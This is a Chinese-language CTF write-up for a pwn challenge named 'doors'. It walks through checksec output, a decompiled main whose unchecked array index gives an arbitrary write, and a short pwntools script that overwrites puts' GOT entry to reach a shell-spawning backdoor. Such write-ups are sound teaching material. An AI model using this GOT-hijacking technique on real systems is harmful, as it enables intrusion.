Pwn CTF doors Writeup

kazma 成大資安社 創辦人/社長

Exploitation

首先我們看一下這題的保護機制:

1
2
3
4
5
6
7
└─$ checksec doors
[*] '/home/kazma/doors'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)

然後我們看到程式主邏輯很簡單:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int __fastcall main(int argc, const char **argv, const char **envp)
{
int input_num; // [rsp+4h] [rbp-Ch] BYREF
unsigned __int64 canary; // [rsp+8h] [rbp-8h]

canary = __readfsqword(0x28u);
init();
puts("There are many doors.\nChoose one and enter the correct password than you will got the treasure !!");
printf("The door number you want to choose : ");
__isoc99_scanf("%d", &input_num);
printf("Password : ");
__isoc99_scanf("%lld", (char *)&doors + 8 * input_num);
puts("Oh no,password is wrong,try again ~");
return 0;
}

以及一個後門:

1
2
3
4
int treasure()
{
return execve("/bin/sh", 0LL, 0LL);
}

所以觀察一下使用者可控的兩個輸入,我們可以發現第一個輸入可以讓第二個輸入任意寫,然後我們可以透過任意寫 puts 的 got 來達成 GOT-Hijacking 然後跳到 treasure 觸發 RCE。

Exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
from pwn import *

p = process('./doors')
elf = ELF('./doors')

puts_got = elf.got['puts']
doors = elf.symbols['doors']
treasure = elf.symbols['treasure']

idx = (puts_got - doors) // 8

p.sendlineafter(": ", str(idx))
p.sendlineafter(": ", str(treasure))

p.interactive()

Pwned !!!

  • Title: Pwn CTF doors Writeup
  • Author: kazma
  • Created at : 2024-11-11 13:55:04
  • Updated at : 2024-11-11 19:56:13
  • Link: https://kazma.tw/2024/11/11/Pwn-CTF-doors-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
Pwn CTF doors Writeup